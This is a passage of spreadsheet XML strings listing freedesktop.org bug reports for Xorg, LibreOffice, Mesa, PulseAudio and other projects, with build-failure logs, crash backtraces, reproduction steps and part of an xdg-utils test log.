	for f in ytstenut-internal.h yts-adapter-factory.h yts-client-internal.h yts-client-status.h yts-contact-impl.h yts-contact-internal.h yts-error.h yts-error-message.h yts-event-message.h yts-factory.h yts-incoming-file-internal.h yts-invocation-message.h yts-marshal.h yts-message.h yts-metadata.h yts-metadata-internal.h yts-outgoing-file-internal.h yts-profile-adapter.h yts-profile.h yts-profile-impl.h yts-profile-proxy.h yts-proxy-factory.h yts-proxy-internal.h yts-proxy-service-impl.h yts-proxy-service-internal.h yts-response-message.h yts-roster-impl.h yts-roster-internal.h yts-service-adapter.h yts-service-emitter.h yts-service-factory.h yts-service-impl.h yts-service-internal.h yts-xml.h yts-vp-playable-proxy.h yts-vp-player-adapter.h yts-vp-player-proxy.h yts-vp-transcript-adapter.h yts-vp-transcript-proxy.h  do \
		if [ `find ../../../ytstenut -name ${f}` =  ] then \
			echo ${b}Error:  ${f} is ignored but not found anyway.${n} \
			exit 1 \
		fi \
	done
[1mError:  ytstenut-internal.h is ignored but not found anyway.[010m
make[5]: *** [check-ignores.stamp] Error 1
make[5]: Leaving directory `/var/lib/buildbot/telepathy/yts-glib-default-i386/build/ytstenut-0.4.0/_build/docs/reference/ytstenut'
make[4]: *** [all-recursive] Error 1
make[4]: Leaving directory `/var/lib/buildbot/telepathy/yts-glib-default-i386/build/ytstenut-0.4.0/_build/docs/reference'
make[3]: *** [all-recursive] Error 1
make[3]: Leaving directory `/var/lib/buildbot/telepathy/yts-glib-default-i386/build/ytstenut-0.4.0/_build/docs'
make[2]: *** [all-recursive] Error 1
make[2]: Leaving directory `/var/lib/buildbot/telepathy/yts-glib-default-i386/build/ytstenut-0.4.0/_build'
make[1]: *** [all] Error 2
make[1]: Leaving directory `/var/lib/buildbot/telepathy/yts-glib-default-i386/build/ytstenut-0.4.0/_build'
make: *** [distcheck] Error 1
program finished with exit code 2
For more details see here: http://buildbot.telepathy.im:8010/builders/ytstenut-glib%20-%20i386/builds/37/steps/Tests/logs/stdio</t>
  </si>
  <si>
    <t>XORG-93219</t>
  </si>
  <si>
    <t>libinput (git version) fails to build due to /libinput/tools error</t>
  </si>
  <si>
    <t>Trying to build libinput (git version) I get the following error:
---
Making all in tools
make[2]: Entering directory '/home/jos/src/xorg/git/libinput/tools'
  CC       libshared_la-shared.lo
  CCLD     libshared.la
ar: `u' modifier ignored since `D' is the default (see `U')
  CC       libinput_list_devices-libinput-list-devices.o
  CCLD     libinput-list-devices
../src/.libs/libinput.so: undefined reference to `__hypot_finite'
../src/.libs/libinput.so: undefined reference to `__atan2_finite'
collect2: error: ld returned 1 exit status
Makefile:565: recipe for target 'libinput-list-devices' failed
make[2]: *** [libinput-list-devices] Error 1
make[2]: Leaving directory '/home/jos/src/xorg/git/libinput/tools'
Makefile:429: recipe for target 'all-recursive' failed
make[1]: *** [all-recursive] Error 1
make[1]: Leaving directory '/home/jos/src/xorg/git/libinput'
Makefile:361: recipe for target 'all' failed
make: *** [all] Error 2
---</t>
  </si>
  <si>
    <t>LIBREOFFICE-35405</t>
  </si>
  <si>
    <t>Using Thesaurus causes crash</t>
  </si>
  <si>
    <t>when i try to use synonimous the program crash and closes.</t>
  </si>
  <si>
    <t>fgbelmon</t>
  </si>
  <si>
    <t>XORG-18246</t>
  </si>
  <si>
    <t>crash if external monitor unplugged during startup</t>
  </si>
  <si>
    <t>Created attachment 19882
X -logverbose (includes backtrace)
X refuses to start if the external monitor configured in xorg.conf is plugged or powered off. backtrace: see xorg.0.logverbose</t>
  </si>
  <si>
    <t>XORG-4424</t>
  </si>
  <si>
    <t>i810/i915: X abort in I830WaitLpRing() w/ two DRI apps(gl-117+any)</t>
  </si>
  <si>
    <t>Happens on xorg 6.8.99.16 and xorg CVS as of 11 Sept. 2005
Kernel: 2.6.11.4 and 2.6.13.1
drm.ko and i915.ko: from 6.8.99.16 current xorg and 2.6.13.1
To reproduce:
run gl-117 (in the URL tag of this build) in windowed mode and at the same
have any other DRI window open which overlaps gl-117. During the loading
phase of gl-117 everything works fine but when the main GL engine of gl-117
initializes X crashes with:
...
i830DRISwapContext (in)
I830Sync
Error in I830WaitLpRing() now is 94026 start is 92025
pgetbl_ctl: 0x1ffc0001 pgetbl_err: 0x0
ipeir: 0 iphdr: 6db3ffff
LP ring tail: a7c0 head: a418 len: 1f001 start 0
eir: 0 esr: 1 emr: ffff
instdone: ffc1 instpm: 0
memmode: 108 instps: 800f0050
hwstam: fffe ier: 2 imr: 8 iir: 20
space: 130128 wanted 131064
(II) I810(0): [drm] removed 1 reserved context for kernel
(II) I810(0): [drm] unmapping 8192 bytes of SAREA 0xe083a000 at 0x406c6000
Fatal server error:
lockup
(xorg help banner here)
Error in I830WaitLpRing() now is 96041 start is 94040
pgetbl_ctl: 0x1ffc0001 pgetbl_err: 0x0
ipeir: 0 iphdr: 6db3ffff
LP ring tail: a7c8 head: a418 len: 1f001 start 0
eir: 0 esr: 1 emr: ffff
instdone: ffc1 instpm: 0
memmode: 108 instps: 800f0050
hwstam: fffe ier: 2 imr: 8 iir: 20
space: 130120 wanted 131064
FatalError re-entered aborting
On another occurance the server was spinning and a gdb which I attached
afterwards got this backtrace:
#0  0x405e0146 in I830SubsequentSolidFillRect () from
/usr/X11R6/lib/modules/drivers/i810_drv.so
#1  0x405ec00d in I830DRIInitBuffers () from
/usr/X11R6/lib/modules/drivers/i810_drv.so
#2  0x405b4d1b in DRIWindowExposures () from
/usr/X11R6/lib/modules/extensions/libdri.so
#3  0x0819a712 in miHandleValidateExposures ()
#4  0x080ddca0 in UnmapWindow ()
#5  0x080e0f2a in DeleteWindow ()
#6  0x080d66ab in FreeClientResources ()
#7  0x080c19f6 in CloseDownClient ()
#8  0x080c7e49 in Dispatch ()
#9  0x080d4d55 in main ()
The X server does not react to SIGTERM afterwards. After
killing it with SIGKILL and a restart with also ends up
looping with this trace:
#0  0x405e02e6 in I830SubsequentMono8x8PatternFillRect () from
/usr/X11R6/lib/modules/drivers/i810_drv.so
#1  0x4077ca50 in XAAFillMono8x8PatternRectsScreenOrigin () from
/usr/X11R6/lib/modules/libxaa.so
#2  0x4078730d in XAAPaintWindow () from /usr/X11R6/lib/modules/libxaa.so
#3  0x0816c12c in damagePaintWindow ()
#4  0x081a2598 in miWindowExposures ()
#5  0x080b5f58 in xf86XVWindowExposures ()
#6  0x405b4d53 in DRIWindowExposures () from
/usr/X11R6/lib/modules/extensions/libdri.so
#7  0x080de36f in MapWindow ()
#8  0x080de4a5 in InitRootWindow ()
#9  0x080d4ef8 in main ()
Using EXA instead of XAA it only spins and does not die in I830WaitLpRing
the EXA diff for this is here:
http://ffii.org/~bkaindl/software/xorg/i830-exa-bkaindl-01.diff
XAA testing was done on unpatched source.
Test command for used for reproducing (both configured to use windowed mode):
gl-117  briquolo</t>
  </si>
  <si>
    <t>bkaindl</t>
  </si>
  <si>
    <t>DRI-103802</t>
  </si>
  <si>
    <t>[IVB] Linux 4.13 regression: ES2-CTS.functional.fragment_ops.blend failure</t>
  </si>
  <si>
    <t>A number of test failures have been observed when running ES2-CTS.functional.fragment_ops.blend.* tests on IVB with the 4.13 kernel.
Setting INTEL_DEBUG=reemit (again on 4.13) causes these tests to pass consistently.
In order to reproduce this we had to loop these tests and run multiple loops at the same time on the system. It took a handful of iterations for the failure to happen.
These failures do not occur when the kernel version is rolled back to 4.9. No other hardware platforms were tested.</t>
  </si>
  <si>
    <t>XORG-21818</t>
  </si>
  <si>
    <t>scroll bar image deformation</t>
  </si>
  <si>
    <t>Created attachment 26008
bad image
Using Iceweasel as my browser and the NASA Night Launch theme I'm seeing some image deformation in the area unoccupied by the scroll bar. Usually tiny black and gray boxes appear in that area but now in latest git I see a series of jagged lines.
git-bisect reveals that the problem code is somewhere in this commit:
http://cgit.freedesktop.org/xorg/driver/xf86-video-ati/commit/?id=026b6f820d6caea17d2a082193e850713d5770a8
Thanks for all the hard work radeon developers!</t>
  </si>
  <si>
    <t>PORTLAND-66605</t>
  </si>
  <si>
    <t>xdg-desktop-menu does not support filenames with spaces</t>
  </si>
  <si>
    <t>Steps to reproduce:
1. Create a .desktop file with a vendor prefix and a space in the name. e.g. foo-bar baz.desktop.
2. Run: xdg-desktop-menu install --mode user foo-bar baz.desktop
Expected result: The file is copied to ~/.local/share/applications/foo-bar baz.desktop.
Actual result:
xdg-desktop-menu: filename 'baz.desktop' does not have a proper vendor prefix
A vendor prefix consists of alpha characters ([a-zA-Z]) and is terminated
with a dash (-). An example filename is 'example-baz.desktop'
Use --novendor to override or 'xdg-desktop-menu --manual' for additional info.
This is because it thinks I am passing two separate filenames (foo-bar and baz.desktop) even though I correctly used quotes on the command line. This is caused by line 998 of the script which concatenates all arguments ending in .desktop onto $desktop_files separating each argument with a space. After that point it is impossible to tell which spaces separate arguments and which are part of the filename.
(Note that if all of the space-separated parts of the filename contain a - you don't see the above error it just fails silently because it can't find the files it is trying to copy.)</t>
  </si>
  <si>
    <t>mgiuca</t>
  </si>
  <si>
    <t>DRI-35789</t>
  </si>
  <si>
    <t>[SNB bisected]Boot without X with external VGA connected LVDS will get black screen</t>
  </si>
  <si>
    <t>System Environment:
--------------------------
Platform:   HunronrRiver
Libdrm:    (master)2.4.24-7-gfd3ed34a2070fca3804baf54ece40d0bc2666226
Mesa:      (master)5d7c27f5ec2f30c264dc2d53c4980970b3a13ee5
Xserver:        
(master)xorg-server-1.10.0-142-ga095a6d4e8f5090907e8d3d66018636216300846
Xf86_video_intel:        
(master)2.14.901-22-g79e7f4ca3b5f035af6f473b5a53c3fe7d1361089
Cairo:     (master)90156f6ab7b94e9e576e34f6a2d8cb809242f8d0
Libva:     (master)a259f9ef76d5719d19e273b17478ffedeff01ddc
Kernel:(drm-intel-next) f0c860246472248a534656d6cdbed5a36d1feb2e
Bug detailed description:
--------------------------------------
With external VGA connected boot without X LVDS will get black screen on HunronRiver.It's kernel regression.The commit 467cff is good commit.
Reproduce steps:
--------------------------------------
1.with external VGA connected
2.boot without X into text mode</t>
  </si>
  <si>
    <t>PULSEAUDIO-102060</t>
  </si>
  <si>
    <t>Security: PulseAudio server weakens the umask</t>
  </si>
  <si>
    <t>We have a strict umask 077 policy here i.e. all files created under /home
must have 00 permissions for group and other.
However in spite of its initial umask being 077 the pulseaudio daemon 
creates files with permissions 644 in $HOME/.config/pulse.
A quick look into the source found a umask(0022) in src/daemon/main.c .
It may create files with more restrictive permissions than the umask says
(e.g. with 644 if the umask is 000) but it must not ignore the initial umask
or set its umask to something weaker than the initial umask
and it must not create files with less restricive permissions than the umask!</t>
  </si>
  <si>
    <t>PULSEAUDIO-87800</t>
  </si>
  <si>
    <t>Updated Swedish translation for PulseAudio</t>
  </si>
  <si>
    <t>Created attachment 111432
Latest PulseAudio - Swe
Attached is an updated version of the Swedish translation of PulseAudio. It has been reviwed by two fellow translators.</t>
  </si>
  <si>
    <t>josef.andersson</t>
  </si>
  <si>
    <t>TELEPATHY-24877</t>
  </si>
  <si>
    <t>Messages are getting lost</t>
  </si>
  <si>
    <t>Created attachment 30941
butterfly.log
When talking to msn contact for some reason messages are lost. I've attached a .log and a screenshot to 'prove' this problem. As you can see I've send the text 'test 1' until 'test 7' to myself via an old msn adress. The conversation window only received 'test 1' until 'test 4'.
This really should be fixed as soon as possible because this isn't desirable
at all.
BTW I was directed here from the empathy bug tracker.</t>
  </si>
  <si>
    <t>marceldevries</t>
  </si>
  <si>
    <t>PLYMOUTH-23159</t>
  </si>
  <si>
    <t>plymouth crashes when hitting escape/ctrl-v in a tight loop</t>
  </si>
  <si>
    <t>There is apparently a race condition between hitting escape and pressing ctrl-v in a loop.  If you do it quickly enough plymouth with eventually blow an assertion
ply-window.c:632 ply_window_set_mode: assertion window != ((void *) 0 failed</t>
  </si>
  <si>
    <t>MESA-96505</t>
  </si>
  <si>
    <t>[IVBGT1] piglit.spec.arb_compute_shader.linker.bug-93840 regression</t>
  </si>
  <si>
    <t>This test began asserting with mesa 1db37ebecf5af55215ace3801f8dbb8b10c5305e
i965: Assert that the scratch spaces are in range.
I don't know that anything actually guarantees this but if we exceed
the limits we may end up overflowing and trashing random buffers that
happen to be nearby in the VMA space leading to rendering corruption
hangs or worse.
We should really fix this properly.  However the pitfall has existed
for ages so for now we should at least detect it.
Cc: 12.0 
Signed-off-by: Kenneth Graunke 
Reviewed-by: Francisco Jerez 
Reviewed-by: Jordan Justen 
shader_runner: /home/jenkins/workspace/Leeroy/repos/mesa/src/mesa/drivers/dri/i965/brw_fs.cpp:6005: void fs_visitor::allocate_registers(bool): Assertion `prog_data-&gt;total_scratch &lt; 12 * 1024' failed.
IVBGT1 is not tested for developer branches in CI so there was no way to catch this pre-commit.</t>
  </si>
  <si>
    <t>XORG-5151</t>
  </si>
  <si>
    <t>Segfault in xf86Cursor.c due to uninitialized reference screen</t>
  </si>
  <si>
    <t>I found this with the i810 driver but AFAICS it could occure with any driver.
If a xinerama configuration references a screen that is not correctly configured
(e.g. because the hardware coudn't be found) the xserver segfaults in xf86Cursor
in Line 618ff due to access of xf86Screens[ref]-&gt;pScreen with xf86Screens[ref]
== NULL.
This should create an error message instead.</t>
  </si>
  <si>
    <t>DEJAVU-8213</t>
  </si>
  <si>
    <t>Serif</t>
  </si>
  <si>
    <t>DejaVu serif italic Ã¦</t>
  </si>
  <si>
    <t>The a part of the italic Ã¦ in DejaVu serif does not look like an italic a from
the same font.</t>
  </si>
  <si>
    <t>mattias.ellert</t>
  </si>
  <si>
    <t>LIBREOFFICE-34789</t>
  </si>
  <si>
    <t>Standart filter works very slow</t>
  </si>
  <si>
    <t>Created attachment 43867
example file to demonstrate slow filter
If table contains thousands of string then standart filter works to very slow in LibreOffice-3.3.0 and LibreOffice-3.3.1.
(this bug was tested by me on linux-x86-64 but it's need to verify on other os)
1. Open attached file qwedasr.ods (this file was sent me by another man) 
2. choose second row val and aplay standart filter (Data -&gt; Filter -&gt; Standart Filter) by setting [val &lt; -500]. Note that it takes about few seconds (on my system it's about 3 seconds [amd phenom II X4 955 (3.2 GHz) 4GB ram]).
3. Now (or you can do it first instead of item 2 of descrition) select the same row val and aplay standart filter (Data -&gt; Filter -&gt; Standart Filter) by setting [val &gt; -100]. Note that time of filtering takes few second again (on my system it's about 7-10 sec.).
Such time results are very strange as in OpenOffice-3.2.1 and -3.3.0 such filtering works instantly.
testing system configuration:
Linux 2.6.36-gentoo-r5 x86_64 
AMD Phenom(tm) II X4 955 Processor
4 Gb RAM
installed versions: 
app-office/libreoffice-bin-3.3.0(-r1)
app-office/libreoffice-bin-3.3.1</t>
  </si>
  <si>
    <t>torohov_s_a</t>
  </si>
  <si>
    <t>XKEYBOARD-CONFIG-28369</t>
  </si>
  <si>
    <t>UK Keyboard layout not properly recognised on MacBook Pro 55 (Nov 2009)</t>
  </si>
  <si>
    <t>Created attachment 36031
Apple MacBook Pro 55 (Nov 2009) - United-Kingdom Keayboard Layout Photo
This bug is created as requested from existing bug (https://bugs.freedesktop.org/show_bug.cgi?id=28353).
By this message I would like to report the bug I encounter with keyboard
detection on Laptop MacBook Pro 55 (purchased in Nov 2009) in the UK installed
with Ubuntu 9.10 (and fully updated) on amd64 architecture.
----------------------------------------------------
Summary 
The UK keyboard layout of this laptop is quite special and none of the
existing option in the gnome setting panel of the keyboard allow full
recognition of this layout.
----------------------------------------------------
Full description
Following installation of Ubuntu it appears that by default the specific UK
keyboard of Apple MacBook pro laptop version 55 of Nov 2009 is not properly
recognised. It also appears to me after comparing with other keyboard that
Apple slightly changed the layout for that specific version of laptop (After
completing this message I will attach the keyboard layout image for you to
see remind me if I forgot to attach file :)
Please note also that I have also to write in French with this keyboard so in
order to match my need and the layout here is how I configured the layout in
gnome:
System &gt; Preference &gt; Keyboard
then Tab Layout
Keyboard Model: MacBook/MacBookPro (Intl)
Selected Layout: United Kingdom International (with dead keys)
Previously set to United Kindom Macintoch (which remain in the list of layout
but unselected)
I managed so far to make some of french letter with following key combinaison :
ALT Right + : + e = Ã©
ALT Right + ' + e = Ãª (or SHIFT + 6 + e)
ALT Right + \| + e = Ã¨ (or `Â¬ + e)
but I can't manage to type this letter
http://en.wikipedia.org/wiki/%C3%87 (maybe due to my ignorance of the proper
key combination can't find it)
Those combinaison while not totally working are much more complicated that the
usual once met on US International Keyboard :
' + e = Ã©
` + e = Ã¨
' + c = http://en.wikipedia.org/wiki/%C3%87
As I work as well under Debian (within a virtual machine on this Laptop hosted
by Ubuntu) I did managed at some point of time under this operating system to
solve some of my issue by twinking manually the defaut keyboard layout config
file as follow (information below may not be totally accurate as I don't recall
exaclty the process) :
File manually modified (corresponding to english keyboard layout) :
/usr/share/X11/xkb/symbols/gb 
I edited file and modified the intl part as follow to match UK keyboard layout
:
$ gedit /usr/share/X11/xkb/symbols/gb
...
partial alphanumeric_keys 
xkb_symbols intl { 
    // Describes the differences between a very simple en_US 
    // keyboard and a very simple U.K. keyboard layout with 
    // dead keys. By Phil Jones (philjones1@blueyonder.co.uk) 
    // Includes the following keys: 
    // dead_grave 
    // dead_acute 
    // dead_circumflex 
    // dead_tilde 
    // dead_diaeresis 
    include latin 
    name[Group1]=United Kingdom - International (with dead keys) 
    key   { [   2                       at           EuroSign    
onehalf ] }
    key   { [   3                 sterling        twosuperior   
onethird ] }
    key   { [   4                   dollar      threesuperior 
onequarter ] }
    key   { [   6          dead_circumflex           NoSymbol   
onesixth ] }
    key     { [   o                        O                 oe       
  OE ] }
    key   { [ dead_acute    dead_diaeresis     dead_diaeresis        
bar ] } //dead_doubleacute
    key   { [ section            plusminus            notsign    
notsign ] } //dead_grave
    key   { [ backslash                bar         numbersign        
bar ] }
    key   { [ dead_grave        dead_tilde          brokenbar        
bar ] }
    include level3(ralt_switch)
}
// Describe the differences between the US Colemak layout
// and a UK variant. By Andy Buckley (andy@insectnation.org)
...
# Apply modification
$ setxkbmap
I am sure they might be a better and more professional and finish way to do it
but as I am not very familiar with the keybaord conf architecture it is very
difficult for me event to understand clearly how I manage to do this :)
Ideally I would prefer to see an option in the keyboard gnome setting panel
like :
Keyboard model: MacBook Pro 55
Select Layout: UK International (which works as US International keyboard)
This way I would be sure it works :)
----------------------------------------
I had also the following if it can be of any help :
HOST Ubuntu
$ setxkbmap -print
xkb_keymap {
    xkb_keycodes  { include evdev+aliases(qwerty)    }
    xkb_types     { include complete    }
    xkb_compat    { include complete    }
    xkb_symbols   { include pc+gb(mac)+inet(evdev)    }
    xkb_geometry  { include pc(pc105)    }
}
VM Debian
 setxkbmap -print
xkb_keymap {
    xkb_keycodes  { include macintosh+macintosh(goodmap)+aliases(qwerty)   
}
    xkb_types     { include complete+numpad(mac)    }
    xkb_compat    { include complete    }
    xkb_symbols   { include
pc+macintosh_vndr/gb+inet(apple)+level3(enter_switch)+gb(intl):2+level3(ralt_switch_for_alts_toggle):1+level3(ralt_switch_for_alts_toggle):2+group(alts_toggle)+eurosign(e)
   }
    xkb_geometry  { include macintosh(macbook79)    }
}
----------------------------------------
Thank you for any help or update you may provide to have those two bugs
resolved :)
Would you need more information feel free to contact me.
Have nice day.
Richard</t>
  </si>
  <si>
    <t>richard.leger</t>
  </si>
  <si>
    <t>XORG-57649</t>
  </si>
  <si>
    <t>xf86-video-ati: Acceleration of solid pictures broken on big endian</t>
  </si>
  <si>
    <t>Created attachment 70730
EXA: Fix acceleration of solid pictures on big endian
On OpenBSD/macppc with drm and UMS ati driver 6.14.5 and 6.14.6 gtk (cairo?) applications do not render black fonts correctly. 
This does not happen when using 'Option AccelMethod XAA' nor with the ati driver version 6.14.4.
I believe the problem comes from an endianness issue related to the support for accelerated solid pictures added between 6.14.4 and .5. The attached patch fixes
this issue for me tested on a mac mini (rv280) and powerbook (rv350).
Don't hesitate if you need more information.</t>
  </si>
  <si>
    <t>mpi</t>
  </si>
  <si>
    <t>XORG-10742</t>
  </si>
  <si>
    <t>xf86-video-glint crash during load because of endian problem</t>
  </si>
  <si>
    <t>Christian Tusche reported this bug to the Debian BTS today. He's using the xf86-video-glint driver 1.1.1 (1:1.1.1-3 in Debian) on a Sparc machine (and thinks the bug might also occur on PPC).
System configuration:
Sun Ultra60 with Raptor GFX graphic card (Permedia2v chipset)
running etch with a 2.6.20 kernel.
The problem also existed in Xorg 7.0.
Problem:
The Xserver hangs or crashes when loading the driver. As from the logfile the card is wrongly detected e.g. 4MB video ram instead 
of 8MB.
Reason:
The driver correctly writes to the big-endian registers of the card but the 
MMIO_xxxx functions do a byte-swap by default on this architecture ending up 
in a wrong byte-order. For reference see compiler.h from the xorg-server 
source.
Solution:
Define SPARC_MMIO_IS_BE for compiling the glint driver.
E.g. by:
# CFLAGS=-O2 -DSPARC_MMIO_IS_BE ./configure
(maybe on PPC_MMIO_IS_BE has to be defined on PPC architecture)
I suggest setting these defines in the source code in config.h.</t>
  </si>
  <si>
    <t>LIBREOFFICE-53938</t>
  </si>
  <si>
    <t>EDITING: CRASH when updating a pivot table if source database not available</t>
  </si>
  <si>
    <t>Steps how to reproduce  with LibreOffice 3.6.1.1  German UI/Locale [Build-ID:  4db6344] on German WIN7 Home Premium (64bit):
0. download / unzip Attachment 65689 of 53640 - Pivot Table form
   Datasource (Base Query) is BROKEN
1. Open TRainings-2012.ods by double click from WIN File Explorer
2. Right click E7 for context menu -&gt; Update
   &gt; Error message similar data source not available appears
3. 
   Bug: Crash
Also crashes with  parallel installation of Master LOdev  3.7.0.0.alpha0+   - WIN7 Home Premium (64bit) ENGLISH UI [Build ID: 6900781] (tinderbox: 2008R2@20 pull time 2012-08-14 09:27:23)
Sounds similar to Bug 37458 - Crash when updating a pivot table if source data not available what has been fixed for 3.4.1?
@rado:
Can you confirm this problem</t>
  </si>
  <si>
    <t>LIBREOFFICE-74050</t>
  </si>
  <si>
    <t>Page count bloat when loading document</t>
  </si>
  <si>
    <t>I have a 245 page document.  When I load it the page count goes from 245 to 295. The page count is not stable and change by +/- 1 count. It is not possible to edit the document because the page changes.
To resolve the problem  I simply go at the beginning of the document and Update the TOC.  The page count goes back to 245 and all is stable and can be edited.</t>
  </si>
  <si>
    <t>belanger</t>
  </si>
  <si>
    <t>XORG-26790</t>
  </si>
  <si>
    <t>NV40 - Not center screen</t>
  </si>
  <si>
    <t>Open bug in Launchpad:
https://bugs.edge.launchpad.net/ubuntu/+source/xserver-xorg-video-nouveau/+bug/529130
==Not center screen==
Photo example:
https://bugs.edge.launchpad.net/ubuntu/+source/xserver-xorg-video-nouveau/+bug/529130/comments/1
Hardware:
01:00.0 VGA compatible controller [0300]: nVidia Corporation G72 [GeForce 7300 LE] [10de:01d1] (rev a1)
Thanks
Cristian</t>
  </si>
  <si>
    <t>LIBREOFFICE-79021</t>
  </si>
  <si>
    <t>FORMATTING: Crash when using keyboard to select 1st parameter of conditional formatting</t>
  </si>
  <si>
    <t>Problem description: 
If you use the keyboard to select Formula is from the conditional formatting dialog all instances of the program shut down without any further messages. File recovery is successful. I discovered this when using a mouse that was a little too sensitive and I kept missing the desired option when I clicked.
Steps to reproduce:
1. Highlight a cell and select Format&gt; Conditional formatting.
2. Click on the dropdown that currently reads Cell value is
3. Press F to select Formula is.
4. The selection is highlighted.
5. Crash.
Current behavior:
As above.
Expected behavior:
Highlight stays in place and I tab to the next option.
Operating System: Windows XP
Version: 4.1.6.2 release</t>
  </si>
  <si>
    <t>hjcarls3</t>
  </si>
  <si>
    <t>PORTLAND-8030</t>
  </si>
  <si>
    <t>Use of uninitialized value in regexp compilation at /home/fun/xdg-utils-1.0beta3/tests/include/linux_distro line 135  line 1. - gnome - 7 tests failed 192 of 208 tests passed. (245 attempted)</t>
  </si>
  <si>
    <t>FAILURE SUMMARY
[Sun Aug 27 16:48:08 CEST 2006] test_plain_file_uninstall: verify  is
uninstalled correctly from the desktop: FAIL 
[Sun Aug 27 16:50:50 CEST 2006] test_menu_system_install: verify a system menu
is created correctly: FAIL 
[Sun Aug 27 16:52:24 CEST 2006] test_svg_icon_render: ensure that SVG icons are
rendered: FAIL 
[dim aoÃ» 27 16:55:03 CEST 2006] test_desktop_icon_install: verify a desktop file
installed correctly on the desktop: FAIL 
[dim aoÃ» 27 17:04:47 CEST 2006] test_screensave_reset: verify screensaver reset:
FAIL 
[dim aoÃ» 27 17:05:31 CEST 2006] test_default_mime_launch: verify we can install
a mime type &amp; associate it with an applciation: FAIL 
[dim aoÃ» 27 17:06:07 CEST 2006] test_svg_icon_render: ensure that SVG icons are
rendered: FAIL 
======================================================
[dim aoÃ» 27 16:48:00 CEST 2006] TEST RUN START: 
distribution: Use of uninitialized value in regexp compilation at
/home/fun/xdg-utils-1.0beta3/tests/include/linux_distro line 135  line 1.
arch 1
xdg-utils: 1.0beta3
kde: not present (didn't find kde-config)
gnome: 2.14.3
xfce: not present (didn't find xfce4-session)
running: gnome  
user: normal
uname: Linux zod 2.6.17.10-raf #6 PREEMPT Fri Aug 25 00:38:22 CEST 2006 i686
Intel(R) Pentium(R) M processor 1.73GHz GenuineIntel GNU/Linux
xset data:
-------------------------------------
Keyboard Control:
  auto repeat:  on    key click percent:  0    LED mask:  00000000
  auto repeat delay:  500    repeat rate:  30
  auto repeating keys:  00ffffffdffffbbf
                        fadfffdfffdfe5ef
                        ffffffffffffffff
                        ffffffffffffffff
  bell percent:  50    bell pitch:  400    bell duration:  100
Pointer Control:
  acceleration:  2/1    threshold:  4
Screen Saver:
  prefer blanking:  yes    allow exposures:  yes
  timeout:  0    cycle:  0
Colors:
  default colormap:  0x20    BlackPixel:  0    WhitePixel:  16777215
Font Path:
/usr/share/fonts/misc/usr/share/fonts/cyrillic/usr/share/fonts/Type1/usr/share/fonts/100dpi/usr/share/fonts/75dpi/usr/share/fonts/TTF
Bug Mode: compatibility mode is disabled
DPMS (Energy Star):
  Standby: 0    Suspend: 0    Off: 0
  DPMS is Enabled
  Monitor is On
Font cache:
  Server does not have the FontCache Extension
File paths:
  Config file:  /etc/X11/xorg.conf
  Modules path: /usr/lib/xorg/modules
  Log file:     /var/log/Xorg.0.log
-------------------------------------
[Sun Aug 27 16:48:07 CEST 2006] ---- root run start: 
[Sun Aug 27 16:48:07 CEST 2006] generic_bogus_arg: generic bogus argument
xdg-desktop-icon: PASS
[Sun Aug 27 16:48:07 CEST 2006] generic_help: generic help message -
xdg-desktop-icon: PASS
[Sun Aug 27 16:48:07 CEST 2006] generic_manual: generic manual -
xdg-desktop-icon: PASS
[Sun Aug 27 16:48:07 CEST 2006] generic_no_arg: generic noarg -
xdg-desktop-icon: PASS
[Sun Aug 27 16:48:07 CEST 2006] generic_version: generic version arg -
xdg-desktop-icon: PASS
[Sun Aug 27 16:48:07 CEST 2006] test_notexist_file_uninstall: verify
uninstalling pain_file_uninstall.txt does not cause an error if it is not
installed.: PASS
[Sun Aug 27 16:48:08 CEST 2006] test_plain_file_install: verify  is installed
correctly on the desktop: NORESULT 
Found './xdgtestdata-08-27+7.txt' in
Initilization failed!
[Sun Aug 27 16:48:08 CEST 2006] test_plain_file_uninstall: verify  is
uninstalled correctly from the desktop: FAIL 
Found './xdgtestdata-08-27+8.txt' in
[Sun Aug 27 16:48:08 CEST 2006] test_desktop_icon_install: verify a desktop file
installed correctly on the desktop: PASS
[Sun Aug 27 16:48:08 CEST 2006] test_desktop_icon_uninstall: verify desktop file
is uninstalled correctly from the desktop: PASS
[Sun Aug 27 16:48:08 CEST 2006] generic_bogus_arg: generic bogus argument
xdg-desktop-menu: PASS
[Sun Aug 27 16:48:08 CEST 2006] generic_help: generic help message -
xdg-desktop-menu: PASS
[Sun Aug 27 16:48:08 CEST 2006] generic_manual: generic manual -
xdg-desktop-menu: PASS
[Sun Aug 27 16:48:08 CEST 2006] generic_no_arg: generic noarg -
xdg-desktop-menu: PASS
[Sun Aug 27 16:48:08 CEST 2006] generic_version: generic version arg -
xdg-desktop-menu: PASS
[Sun Aug 27 16:48:08 CEST 2006] test_menu_user_forceupdate: verify forceupdate
doesn't error for --mode user: PASS
[Sun Aug 27 16:48:08 CEST 2006] test_menu_system_as_nonroot: verify error for
--mode system when run as a normal user: UNTESTED 
running as root but test must be run as a normal user
[Sun Aug 27 16:48:08 CEST 2006] test_menu_system_forceupdate: verify forceupdate
doesn't error for --mode system: PASS
[Sun Aug 27 16:48:08 CEST 2006] test_simple_menu_item_user_install: verify a
desktop file is installed in the user's applications menu: PASS
[Sun Aug 27 16:48:08 CEST 2006] test_simple_menu_item_user_uninstall: verify a
desktop file is uninstalled from the user applications menu: PASS
[Sun Aug 27 16:48:09 CEST 2006] test_menu_user_install: verify a user menu is
created correctly: PASS
[Sun Aug 27 16:48:09 CEST 2006] test_menu_user_uninstall: verify a user menu is
removed correctly: PASS
[Sun Aug 27 16:48:09 CEST 2006] test_menu_install_category: verify a desktop
file is installed in the correct category: PASS
[Sun Aug 27 16:48:53 CEST 2006] test_simple_menu_item_system_install: verify a
desktop file is installed in the system applications menu: WARN 
User indicated 'n' instead of 'y' in respnonse to 'Is an item called 'TEST
08-27+24' somewhere in the menu tree possibly in a generic location?
	(NOTE: If you are using KDE it may take a few seconds to appear.)'
Test has already failed. Not bothering to ask 'Please select the menu item 'TEST
08-27+24''
'/home/fun/xdg-utils-1.0beta3/tests/tmp/xdgt2006-08-27-164853.226279000-31981-1238/xdgtestdata-xdgt2006-08-27-164853.226279000-31981-xdg-test-menu-item-install.tmp'
does not exist
[Sun Aug 27 16:50:35 CEST 2006] test_simple_menu_item_system_uninstall: verify a
desktop file is uninstalled from the system applications menu: NORESULT 
User indicated 'n' instead of 'y' in respnonse to 'Is an item called 'TEST
08-27+25' somewhere in the menu tree possibly in a generic location?
	(NOTE: If you are using KDE it may take a few seconds to appear.)'
Initilization failed!
[Sun Aug 27 16:50:50 CEST 2006] test_menu_system_install: verify a system menu
is created correctly: FAIL 
Did not find
